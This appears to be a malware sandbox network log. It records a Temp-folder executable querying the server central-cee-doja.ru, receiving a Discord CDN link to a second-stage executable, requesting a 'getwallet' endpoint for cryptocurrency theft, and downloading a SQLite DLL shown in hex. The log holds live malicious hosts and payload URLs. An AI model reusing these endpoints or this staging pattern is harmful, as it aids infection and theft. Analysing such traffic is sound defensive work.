2023-11-18 09:02:59 UTC	10514	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	104.21.89.193	443	192.168.2.4	49787	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:58 UTC	10512	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:59 UTC	10513	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y7L4voB1fLVK515O4x80DNkOcBOj8jMuP8UC8wejGBqqZzgO97uj63Ls9efseqk2h2%2B1sDeqvnJ8qPbPikyxIgzvu9KWR%2BbRbtYMsdO9Q70ZsuIwJKu7ocC9a1IwnyCN2Zon0O24"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09a27e95680e-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:59 UTC	10513	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:02:59 UTC	10514	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	104.21.89.193	443	192.168.2.4	49788	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:59 UTC	10514	OUT	GET /getwallet.php?id=1444&wallet=bch HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:00 UTC	10634	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4C5XUOQ9Gj%2BOjjI%2FBZ6evR3zByW3wKHklCYoAJymdiko14kMbIOrZ8UhRCZlmrjk%2Fy%2Bcn4NPNaSeTk1GraX7SCKhhvl3KgOM4jbgGBLirCQEa6eKRl0Qx5IsOOhUdSI1fSx6gyOE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09a85a0bebdf-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:00 UTC	10635	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.4	49788	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:59 UTC	10514	OUT	GET /getwallet.php?id=1444&wallet=bch HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:00 UTC	10634	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4C5XUOQ9Gj%2BOjjI%2FBZ6evR3zByW3wKHklCYoAJymdiko14kMbIOrZ8UhRCZlmrjk%2Fy%2Bcn4NPNaSeTk1GraX7SCKhhvl3KgOM4jbgGBLirCQEa6eKRl0Qx5IsOOhUdSI1fSx6gyOE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09a85a0bebdf-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:00 UTC	10635	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49743	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:32 UTC	13	OUT	GET /dlls/System.Data.SQLite.dll HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:33 UTC	13	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:33 GMT Content-Type: application/x-msdos-program Content-Length: 393520 Connection: close Last-Modified: Tue, 02 Nov 2021 17:44:02 GMT ETag: "60130-5cfd1d6c67c80" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ql356aehV4NGLT%2B6miOp29RTYNsD2%2F2MUAySGhMeISWkPfxerru1ujnbSj4Kt5SxFvs4x6cc7QIUgtbafHQ7hw86VlMyT7H18SSnUHrRaTrXAgMuhbdKSJJrBepLa4B9Kt%2FMPZfL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0901be4308ff-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:33 UTC	14	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 70 81 61 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 b6 05 00 00 08 00 00 00 00 00 00 a6 d3 05 00 00 20 00 00 00 e0 05 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 d9 86 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpa" 0 `
2023-11-18 09:02:33 UTC	15	IN	Data Raw: 3d 00 00 0a 2c 7a 02 0e 04 0e 06 73 2c 06 00 06 7d 08 00 00 04 02 0e 05 7d 09 00 00 04 02 0e 05 7d 0a 00 00 04 14 1f 09 14 14 14 14 02 7b 08 00 00 04 0e 05 1d 8d 1c 00 00 01 25 16 d0 05 00 00 02 28 3e 00 00 0a a2 25 17 03 8c 3d 00 00 02 a2 25 18 04 8c 21 00 00 01 a2 25 19 05 a2 25 1a 0e 04 8c b1 00 00 01 a2 25 1b 0e 05 a2 25 1c 0e 06 8c b3 00 00 01 a2 73 e6 01 00 06 28 09 02 00 06 2a 76 72 29 00 00 70 14 28 5c 05 00 06 2c 08 02 17 7d 18 00 00 04 2a 02 16 7d 18 00 00 04 2a 1e 02 7b 18 00 00 04 2a 7a 02 7b 19 00 00 04 2c 15 d0 05 00 00 02 28 3e 00 00 0a 6f 3f 00 00 0a 73 40 00 00 0a 7a 2a 00 1b 30 02 00 27 00 00 00 00 00 00 00 02 7b 19 00 00 04 2d 0d 02 28 0e 00 00 06 02 17 6f df 00 00 06 de 0f 02 03 28 4e 01 00 06 02 17 7d 19 00 00 04 dc 2a 00 01 10 00 00 Data Ascii: =,zs,}}}{%(>%=%!%%%%s(vr)p(\,}}{z{,(>o?s@z0'{-(o(N}
2023-11-18 09:02:33 UTC	16	IN	Data Raw: 06 0c 08 7e 3c 00 00 0a 28 3d 00 00 0a 2d c8 06 6f 56 00 00 0a 2a 5e 02 7b 08 00 00 04 02 7b 08 00 00 04 28 2b 06 00 06 28 58 01 00 06 2a 1b 30 06 00 6b 00 00 00 06 00 00 11 7e 3c 00 00 0a 0a 03 2c 07 03 28 ff 06 00 06 0a 02 7b 08 00 00 04 28 2b 06 00 06 06 28 ec 05 00 06 0b 07 15 33 1f 28 57 00 00 0a 72 8d 00 00 70 17 8d 1c 00 00 01 25 16 03 a2 28 40 05 00 06 73 02 04 00 06 7a 07 2c 03 17 2b 01 16 0c de 1a 06 7e 3c 00 00 0a 28 3d 00 00 0a 2c 0c 06 28 f8 06 00 06 7e 3c 00 00 0a 0a dc 08 2a 00 01 10 00 00 02 00 06 00 49 4f 00 1a 00 00 00 00 46 02 7b 08 00 00 04 28 2b 06 00 06 28 a3 05 00 06 2a 46 02 7b 08 00 00 04 28 2b 06 00 06 28 8a 05 00 06 2a 1a 28 25 00 00 06 2a 1a 28 a5 05 00 06 2a 1a 28 27 00 00 06 2a 1e 16 28 a6 05 00 06 2a 7e 02 7b 08 00 00 04 2d Data Ascii: ~<(=-oV^{{(+(X0k~<,({(+(3(Wrp%(@sz,+~<(=,(~<IOF{(+(F{(+((%(('(*~{-
2023-11-18 09:02:33 UTC	17	IN	Data Raw: 00 70 73 02 04 00 06 7a 03 28 a8 05 00 06 0a 06 2c 0d 06 02 6f e1 00 00 06 73 01 04 00 06 7a 2a 00 1b 30 03 00 d1 00 00 00 0b 00 00 11 14 0b 28 67 00 00 0a 0c 03 7b f0 02 00 04 7b cf 00 00 04 20 e8 03 00 00 5a 0d 02 28 12 00 00 06 26 00 de 12 03 7b ec 02 00 04 28 31 06 00 06 28 b5 05 00 06 0a dc 02 28 11 00 00 06 2c 18 06 2c 0a 06 1f 64 2e 05 06 1f 65 33 03 1f 09 0a 06 14 73 01 04 00 06 7a 06 1f 09 33 02 16 2a 06 1f 64 33 02 17 2a 06 1f 65 33 02 16 2a 06 2c b3 02 03 6f e8 00 00 06 13 04 11 04 2d 0d 06 02 6f e1 00 00 06 73 01 04 00 06 7a 11 04 1c 2e 05 11 04 1b 33 8f 03 7b f0 02 00 04 2c 87 07 2d 06 73 68 00 00 0a 0b 28 67 00 00 0a 08 59 09 36 0e 11 04 02 6f e1 00 00 06 73 01 04 00 06 7a 07 17 20 96 00 00 00 6f 69 00 00 0a 28 6a 00 00 0a 38 50 ff ff ff 00 Data Ascii: psz(,osz0(g{{ Z(&{(1((,,d.e3sz3d3e3,o-osz.3{,-sh(gY6osz oi(j8P
2023-11-18 09:02:33 UTC	19	IN	Data Raw: 33 04 1f 09 13 04 11 04 14 73 01 04 00 06 7a 11 04 1f 09 3b 88 01 00 00 11 04 1f 11 33 0b 11 05 17 58 13 05 38 5e 01 00 00 11 04 17 40 15 01 00 00 02 6f e1 00 00 06 72 e7 01 00 70 1b 28 77 00 00 0a 2d 73 04 1f 3b 6f 78 00 00 0a 13 10 11 10 15 33 0a 04 6f 74 00 00 0a 17 59 13 10 04 16 11 10 17 58 6f 79 00 00 0a 13 08 04 11 10 17 58 6f 7a 00 00 0a 10 02 0e 05 7e 72 00 00 0a 51 2b 14 02 03 04 05 0e 04 0e 05 6f e5 00 00 06 13 09 0e 05 50 10 02 11 09 2d 09 04 6f 74 00 00 0a 16 30 df 11 09 2c 09 11 09 11 08 6f 18 05 00 06 11 09 13 11 dd 69 01 00 00 02 7b 12 00 00 04 3a c5 00 00 00 02 6f e1 00 00 06 16 72 1d 02 00 70 16 1f 1a 1b 28 7b 00 00 0a 3a ab 00 00 00 0e 05 7e 72 00 00 0a 51 02 17 7d 12 00 00 04 7e 92 02 00 04 d0 09 00 00 02 28 3e 00 00 0a 6f 2e 00 00 0a Data Ascii: 3sz;3X8^@orp(w-s;ox3otYXoyXoz~rQ+oP-ot0,oi{:orp({:~rQ}~(>o.
2023-11-18 09:02:33 UTC	20	IN	Data Raw: 6f e1 00 00 06 73 01 04 00 06 7a 2a 00 00 00 13 30 03 00 64 00 00 00 15 00 00 11 03 7b ec 02 00 04 0a 02 7b 18 00 00 04 2d 08 04 28 39 05 00 06 2c 0e 06 05 0e 04 8c bf 00 00 01 28 40 00 00 06 04 1f 40 6a 28 36 05 00 06 2c 14 0e 04 6e 0c 06 28 31 06 00 06 05 08 28 ae 05 00 06 0b 2b 0f 06 28 31 06 00 06 05 0e 04 28 ad 05 00 06 0b 07 2c 0d 07 02 6f e1 00 00 06 73 01 04 00 06 7a 2a 13 30 03 00 45 00 00 00 14 00 00 11 03 7b ec 02 00 04 0a 02 7b 18 00 00 04 2d 08 04 28 39 05 00 06 2c 0e 06 05 0e 04 8c c3 00 00 01 28 40 00 00 06 06 28 31 06 00 06 05 0e 04 28 ae 05 00 06 0b 07 2c 0d 07 02 6f e1 00 00 06 73 01 04 00 06 7a 2a 00 00 00 13 30 03 00 45 00 00 00 14 00 00 11 03 7b ec 02 00 04 0a 02 7b 18 00 00 04 2d 08 04 28 39 05 00 06 2c 0e 06 05 0e 04 8c c4 00 00 01 Data Ascii: osz0d{{-(9,(@@j(6,n(1(+(1(,osz0E{{-(9,(@(1(,osz*0E{{-(9,
2023-11-18 09:02:33 UTC	21	IN	Data Raw: 06 00 62 00 00 00 19 00 00 11 03 7b ec 02 00 04 0a 06 28 31 06 00 06 05 28 6a 03 00 06 28 b3 05 00 06 0b 02 7b 18 00 00 04 2d 08 04 28 39 05 00 06 2c 37 06 28 31 06 00 06 0c 28 57 00 00 0a 72 30 04 00 70 19 8d 1c 00 00 01 25 16 08 8c b1 00 00 01 a2 25 17 05 a2 25 18 07 8c b5 00 00 01 a2 28 40 05 00 06 28 b2 04 00 06 07 2a 46 03 7b ec 02 00 04 28 31 06 00 06 28 b4 05 00 06 2a 13 30 03 00 36 00 00 00 1b 00 00 11 16 0a 03 7b ec 02 00 04 28 31 06 00 06 04 12 00 28 70 05 00 06 25 7e 3c 00 00 0a 28 66 00 00 0a 2c 0d 1d 02 6f e1 00 00 06 73 01 04 00 06 7a 06 28 6d 03 00 06 2a 4a 03 7b ec 02 00 04 28 31 06 00 06 04 28 bd 05 00 06 2a 00 00 00 13 30 04 00 66 00 00 00 1c 00 00 11 16 0a 03 7b ec 02 00 04 28 31 06 00 06 04 12 00 28 6e 05 00 06 0b 05 02 03 04 6f fb 00 Data Ascii: b{(1(j({-(9,7(1(Wr0p%%%(@(F{(1(06{(1(p%~<(f,osz(mJ{(1(0f{(1(no
2023-11-18 09:02:33 UTC	23	IN	Data Raw: 0e 04 2d 03 06 6a 2a 07 0e 05 58 0e 04 8e 69 31 08 0e 04 8e 69 0e 05 59 0b 07 05 58 06 31 04 06 05 59 0b 07 16 31 0e 08 05 0e 04 0e 05 07 6f 91 00 00 0a 2b 02 16 0b 07 6a 2a 32 02 03 04 6f fb 00 00 06 1b fe 01 2a 1e 03 28 bf 05 00 06 2a 00 00 13 30 09 00 6f 00 00 00 08 00 00 11 02 7b 08 00 00 04 28 2b 06 00 06 03 28 6a 03 00 06 04 1a 7e 3c 00 00 0a 0e 04 0e 05 0e 06 05 2d 03 16 2b 01 17 28 83 05 00 06 0a 06 2d 2b 02 7b 08 00 00 04 28 2b 06 00 06 03 28 6a 03 00 06 04 17 7e 3c 00 00 0a 0e 04 0e 05 0e 06 05 2d 03 16 2b 01 17 28 83 05 00 06 0a 0e 07 2c 10 06 2c 0d 06 02 6f e1 00 00 06 73 01 04 00 06 7a 06 2a 00 13 30 05 00 55 00 00 00 08 00 00 11 02 7b 08 00 00 04 28 2b 06 00 06 03 28 6a 03 00 06 18 7e 3c 00 00 0a 05 28 be 05 00 06 0a 06 2d 1e 02 7b 08 00 00 Data Ascii: -jXi1iYX1Y1o+j2o(0o{(+(j~<-+(-+{(+(j~<-+(,,osz*0U{(+(j~<(-{
2023-11-18 09:02:33 UTC	24	IN	Data Raw: 06 25 2c 09 0e 04 02 6f e1 00 00 06 51 0b de 1a 06 7e 3c 00 00 0a 28 3d 00 00 0a 2c 0c 06 28 f8 06 00 06 7e 3c 00 00 0a 0a dc 07 2a 01 10 00 00 02 00 18 00 28 40 00 1a 00 00 00 00 13 30 02 00 54 00 00 00 28 00 00 11 73 4f 00 00 0a 0a d0 0c 00 00 02 28 3e 00 00 0a 28 99 00 00 0a 0b 16 0c 2b 2d 07 08 9a 0d 09 28 6f 00 00 0a 2d 1d 06 6f 52 00 00 0a 16 31 0c 06 72 c0 05 00 70 6f 54 00 00 0a 26 06 09 6f 54 00 00 0a 26 08 17 58 0c 08 07 8e 69 32 cd 06 6f 56 00 00 0a 2a 13 30 02 00 54 00 00 00 28 00 00 11 73 4f 00 00 0a 0a d0 10 00 00 02 28 3e 00 00 0a 28 99 00 00 0a 0b 16 0c 2b 2d 07 08 9a 0d 09 28 6f 00 00 0a 2d 1d 06 6f 52 00 00 0a 16 31 0c 06 72 c0 05 00 70 6f 54 00 00 0a 26 06 09 6f 54 00 00 0a 26 08 17 58 0c 08 07 8e 69 32 cd 06 6f 56 00 00 0a 2a 13 30 02 Data Ascii: %,oQ~<(=,(~<(@0T(sO(>(+-(o-oR1rpoT&oT&Xi2oV0T(sO(>(+-(o-oR1rpoT&oT&Xi2oV*0
2023-11-18 09:02:33 UTC	25	IN	Data Raw: 09 00 70 73 4a 00 00 0a 7a 7e 3c 00 00 0a 0a 28 92 00 00 0a 03 72 65 09 00 70 28 9b 00 00 0a 6f 95 00 00 0a 0b 14 0c 04 2c 16 28 92 00 00 0a 04 72 65 09 00 70 28 9b 00 00 0a 6f 95 00 00 0a 0c 02 7b 08 00 00 04 28 2b 06 00 06 07 08 12 00 28 97 05 00 06 0d 09 2c 0e 09 06 15 28 6d 03 00 06 73 01 04 00 06 7a de 1a 06 7e 3c 00 00 0a 28 3d 00 00 0a 2c 0c 06 28 a1 05 00 06 7e 3c 00 00 0a 0a dc 2a 01 10 00 00 02 00 14 00 59 6d 00 1a 00 00 00 00 13 30 02 00 29 00 00 00 08 00 00 11 02 7b 08 00 00 04 28 2b 06 00 06 03 2d 03 16 2b 01 15 28 f2 05 00 06 0a 06 2c 0d 06 02 6f e1 00 00 06 73 01 04 00 06 7a 2a 46 02 7b 08 00 00 04 28 2b 06 00 06 28 f3 05 00 06 2a 46 02 7b 08 00 00 04 28 2b 06 00 06 28 f4 05 00 06 2a 22 03 04 28 93 00 00 06 2a 36 02 03 28 6a 03 00 06 28 f6 Data Ascii: psJz~<(rep(o,(rep(o{(+(,(msz~<(=,(~<Ym0){(+-+(,oszF{(+(F{(+("(*6(j(
2023-11-18 09:02:33 UTC	27	IN	Data Raw: 11 08 12 09 12 0a 28 96 00 00 06 11 09 08 32 ea 11 09 08 2e 0b 72 27 0e 00 70 73 02 04 00 06 7a 11 0a 11 09 2e 0b 72 6f 0e 00 70 73 02 04 00 06 7a de 0c 11 07 2c 07 11 07 6f 45 00 00 0a dc 11 04 13 0b de 14 09 2c 06 09 6f 45 00 00 0a dc 06 2c 06 06 6f 45 00 00 0a dc 11 0b 2a 00 00 41 4c 00 00 02 00 00 00 0e 01 00 00 4b 00 00 00 59 01 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 cf 00 00 00 9c 00 00 00 6b 01 00 00 0a 00 00 00 00 00 00 00 02 00 00 00 33 00 00 00 42 01 00 00 75 01 00 00 0a 00 00 00 00 00 00 00 13 30 03 00 2f 00 00 00 2f 00 00 11 02 2d 01 2a 16 0a 2b 20 06 17 58 20 ff 00 00 00 5d d2 0b 02 06 07 9c 02 06 8f c1 00 00 01 25 47 07 61 d2 52 06 17 58 0a 06 02 8e 69 32 da 2a 00 1b 30 06 00 67 00 00 00 30 00 00 11 28 b3 00 00 0a 0a 06 6f b4 00 00 0a 02 Data Ascii: (2.r'psz.ropsz,oE,oE,oEALKYk3Bu0//-+ X ]%GaRXi2*0g0(o
2023-11-18 09:02:33 UTC	28	IN	Data Raw: de 05 00 06 26 2a 66 02 7b 08 00 00 04 28 2b 06 00 06 03 04 7e 3c 00 00 0a 28 df 05 00 06 26 2a 62 02 7b 08 00 00 04 28 2b 06 00 06 03 7e 3c 00 00 0a 28 e8 05 00 06 26 2a 6e 1f 10 03 7e 3c 00 00 0a 28 e3 05 00 06 25 2d 0a 02 03 14 fe 03 7d 0d 00 00 04 2a 36 02 2d 01 2a 02 03 6f bb 00 00 0a 26 2a 00 1b 30 03 00 34 01 00 00 35 00 00 11 17 0a 16 0b 73 4f 00 00 0a 0c 02 14 6f 3f 01 00 06 de 12 26 08 72 01 0f 00 70 28 a7 00 00 06 17 0b 16 0a de 00 00 28 91 05 00 06 20 70 fd 2d 00 32 0a 02 16 14 6f 3e 01 00 06 2b 07 02 14 6f 3d 01 00 06 de 12 26 08 72 3d 0f 00 70 28 a7 00 00 06 17 0b 16 0a de 00 00 02 14 6f 3c 01 00 06 de 12 26 08 72 7b 0f 00 70 28 a7 00 00 06 17 0b 16 0a de 00 00 02 14 6f 3b 01 00 06 de 12 26 08 72 b3 0f 00 70 28 a7 00 00 06 17 0b 16 0a de 00 Data Ascii: &f{(+~<(&b{(+~<(&n~<(%-}6-o&045sOo?&rp(( p-2o>+o=&r=p(o<&r{p(o;&rp(
2023-11-18 09:02:33 UTC	29	IN	Data Raw: 0a 16 0b 06 12 01 28 5f 00 00 0a 28 b0 04 00 06 0c 16 28 b1 04 00 06 16 28 e1 05 00 06 1f 15 fe 01 0d de 11 08 28 b1 04 00 06 dc 07 2c 06 06 28 60 00 00 0a dc 09 2a 01 1c 00 00 02 00 1c 00 0d 29 00 07 00 00 00 00 02 00 08 00 28 30 00 0a 00 00 00 00 13 30 07 00 97 02 00 00 38 00 00 11 0e 04 7b 06 02 00 04 0a 06 1b 33 06 7e 8b 00 00 0a 2a 14 0b 0e 04 7b 05 02 00 04 1f 0d 2e 10 0e 04 28 87 03 00 06 0b 07 04 28 91 03 00 06 0a 04 20 00 01 00 00 6a 28 36 05 00 06 2c 09 02 03 05 6f 0f 01 00 06 2a 06 17 59 45 04 00 00 00 c8 00 00 00 80 00 00 00 30 02 00 00 0a 00 00 00 06 1f 0a 2e 6d 38 26 02 00 00 0e 04 7b 05 02 00 04 1f 09 33 1d 0e 04 7b 06 02 00 04 19 33 13 02 03 05 6f 0f 01 00 06 73 bf 00 00 0a 8c 5e 00 00 01 2a 02 03 05 16 14 16 16 6f 10 01 00 06 69 0c 08 8d Data Ascii: (_((((,(`)(008{3~{.(( j(6,oYE0.m8&{3{3os^oi
2023-11-18 09:02:33 UTC	30	IN	Data Raw: 04 8c b5 00 00 01 a2 73 e6 01 00 06 28 09 02 00 06 02 7b 08 00 00 04 3a 13 01 00 00 dd 92 00 00 00 7e 3c 00 00 0a 0a 28 5a 00 00 0a 6f 5b 00 00 0a 0c 28 5c 00 00 0a 1e 33 15 12 00 21 1b e4 07 44 63 0d df b7 08 6e 60 28 5d 00 00 0a 2b 0e 12 00 20 1b e4 07 44 08 60 28 5e 00 00 0a 16 0d 05 1f 20 6a 28 36 05 00 06 2d 04 09 17 60 0d 05 21 00 00 00 00 00 00 02 00 28 36 05 00 06 2c 04 09 18 60 0d 03 28 6a 03 00 06 04 28 6a 03 00 06 0e 04 09 12 00 28 88 05 00 06 0b 07 2c 08 07 14 73 01 04 00 06 7a 02 06 17 73 2c 06 00 06 7d 08 00 00 04 dc 02 7b 08 00 00 04 13 04 16 13 05 11 04 12 05 28 5f 00 00 0a de 0c 11 05 2c 07 11 04 28 60 00 00 0a dc 14 1f 09 14 14 14 14 02 7b 08 00 00 04 03 1d 8d 1c 00 00 01 25 16 d0 06 00 00 02 28 3e 00 00 0a a2 25 17 03 a2 25 18 04 a2 25 Data Ascii: s({:~<(Zo[(\3!Dcn`(]+ D`(^ j(6-`!(6,`(j(j(,szs,}{(_,(`{%(>%%%
2023-11-18 09:02:33 UTC	32	IN	Data Raw: 00 04 02 14 7d 21 00 00 04 02 17 7d 28 00 00 04 2a 1b 30 02 00 11 00 00 00 00 00 00 00 02 16 28 cc 00 00 06 de 07 02 28 14 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 00 00 09 09 00 07 00 00 00 00 2a 02 03 04 05 28 69 03 00 06 2a 3a 02 17 6f 4e 01 00 06 02 28 c6 00 00 0a 2a 7a 02 7b 2a 00 00 04 2c 15 d0 08 00 00 02 28 3e 00 00 0a 6f 3f 00 00 0a 73 40 00 00 0a 7a 2a 42 02 7b 2a 00 00 04 2d 07 02 17 7d 2a 00 00 04 2a 00 00 1b 30 02 00 11 00 00 00 00 00 00 00 02 16 6f 4e 01 00 06 de 07 02 28 14 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 00 00 09 09 00 07 00 00 00 00 13 30 02 00 4d 00 00 00 1b 00 00 11 02 1f 64 2e 13 02 1f 65 2e 14 02 20 04 02 00 00 33 12 72 2d 13 00 70 2a 72 59 13 00 70 2a 72 85 13 00 70 2a 7e 2b 00 00 04 2d 02 14 2a 02 20 ff 00 00 00 5f 0a 06 Data Ascii: }!}(0(((i:oN(z{,(>o?s@zB{-}*0oN(0Md.e. 3r-prYprp~+- _
2023-11-18 09:02:33 UTC	33	IN	Data Raw: 1f 1d 8d bd 00 00 01 25 16 72 d9 14 00 70 a2 25 17 72 f3 14 00 70 a2 25 18 72 13 15 00 70 a2 25 19 72 3d 15 00 70 a2 25 1a 72 6f 15 00 70 a2 25 1b 72 8b 15 00 70 a2 25 1c 72 b1 15 00 70 a2 25 1d 72 e3 15 00 70 a2 25 1e 72 ff 15 00 70 a2 25 1f 09 72 49 16 00 70 a2 25 1f 0a 72 61 16 00 70 a2 25 1f 0b 72 7f 16 00 70 a2 25 1f 0c 72 c1 16 00 70 a2 25 1f 0d 72 e5 16 00 70 a2 25 1f 0e 72 17 17 00 70 a2 25 1f 0f 72 51 17 00 70 a2 25 1f 10 72 73 17 00 70 a2 25 1f 11 72 a1 17 00 70 a2 25 1f 12 72 d9 17 00 70 a2 25 1f 13 72 07 18 00 70 a2 25 1f 14 72 2b 18 00 70 a2 25 1f 15 72 4f 18 00 70 a2 25 1f 16 72 93 18 00 70 a2 25 1f 17 72 d1 18 00 70 a2 25 1f 18 72 fb 18 00 70 a2 25 1f 19 72 3b 19 00 70 a2 25 1f 1a 72 6f 19 00 70 a2 25 1f 1b 72 9d 19 00 70 a2 25 1f 1c 72 c7 Data Ascii: %rp%rp%rp%r=p%rop%rp%rp%rp%rp%rIp%rap%rp%rp%rp%rp%rQp%rsp%rp%rp%rp%r+p%rOp%rp%rp%rp%r;p%rop%rp%r
2023-11-18 09:02:33 UTC	34	IN	Data Raw: 6f a0 00 00 0a 04 2c 13 02 04 6f d5 00 00 0a 02 04 6f 59 02 00 06 7d cf 00 00 04 05 2c 07 02 05 28 88 01 00 06 04 1d 14 05 02 14 14 14 14 73 e6 01 00 06 28 09 02 00 06 2a 56 02 2d 0b 72 83 1b 00 70 73 4a 00 00 0a 7a 02 6f 70 01 00 06 2a 7a 02 7b d6 00 00 04 2c 15 d0 12 00 00 02 28 3e 00 00 0a 6f 3f 00 00 0a 73 40 00 00 0a 7a 2a 00 1b 30 0c 00 aa 00 00 00 43 00 00 11 02 7b cc 00 00 04 1f 0c 14 02 7b d5 00 00 04 02 14 14 14 18 8d 1c 00 00 01 25 16 03 8c b3 00 00 01 a2 25 17 02 7b d6 00 00 04 8c b3 00 00 01 a2 73 e6 01 00 06 28 09 02 00 06 16 0a 02 7b d6 00 00 04 2d 51 03 2c 4e 14 0b 02 7b ce 00 00 04 2c 16 02 7b ce 00 00 04 6f d6 00 00 0a 75 4a 00 00 02 0b de 03 26 de 00 07 2c 12 07 17 7d 1a 02 00 04 02 14 7d ce 00 00 04 17 0a de 2d 02 14 28 82 01 00 06 02 Data Ascii: o,ooY},(s(V-rpsJzopz{,(>o?s@z*0C{{%%{s({-Q,N{,{ouJ&,}}-(
2023-11-18 09:02:33 UTC	36	IN	Data Raw: 02 7b ce 00 00 04 2c 18 02 7b ce 00 00 04 6f e1 00 00 0a 2c 0b 72 61 1c 00 70 73 bd 00 00 0a 7a 03 2c 19 03 7b f8 02 00 04 02 7b cc 00 00 04 2e 0b 72 c9 1c 00 70 73 ca 00 00 0a 7a 02 03 7d d5 00 00 04 2a 03 2c 0c 02 03 6f 2a 05 00 06 28 82 01 00 06 02 03 7d d5 00 00 04 2a 1e 02 28 87 01 00 06 2a 36 02 03 74 66 00 00 02 28 88 01 00 06 2a 00 1b 30 06 00 d8 00 00 00 48 00 00 11 02 28 70 01 00 06 02 7b cc 00 00 04 0a 06 7b 41 01 00 04 0b 06 2c 03 07 2d 0b 72 41 1d 00 70 73 02 04 00 06 7a 14 0c 14 0d 02 7b cb 00 00 04 13 04 02 7b cf 00 00 04 20 e8 03 00 00 5a 13 05 14 13 06 2b 35 07 06 11 04 11 06 11 05 12 04 6f e5 00 00 06 0d 09 13 06 09 2c 12 08 2d 06 73 dc 00 00 0a 0c 08 09 6f dd 00 00 0a 14 0d 11 04 2c 09 11 04 6f 70 00 00 0a 13 04 11 04 2c 0a 11 04 6f 74 Data Ascii: {,{o,rapsz,{{.rpsz},o(}(6tf(*0H(p{{A,-rApsz{{ Z+5o,-so,op,ot
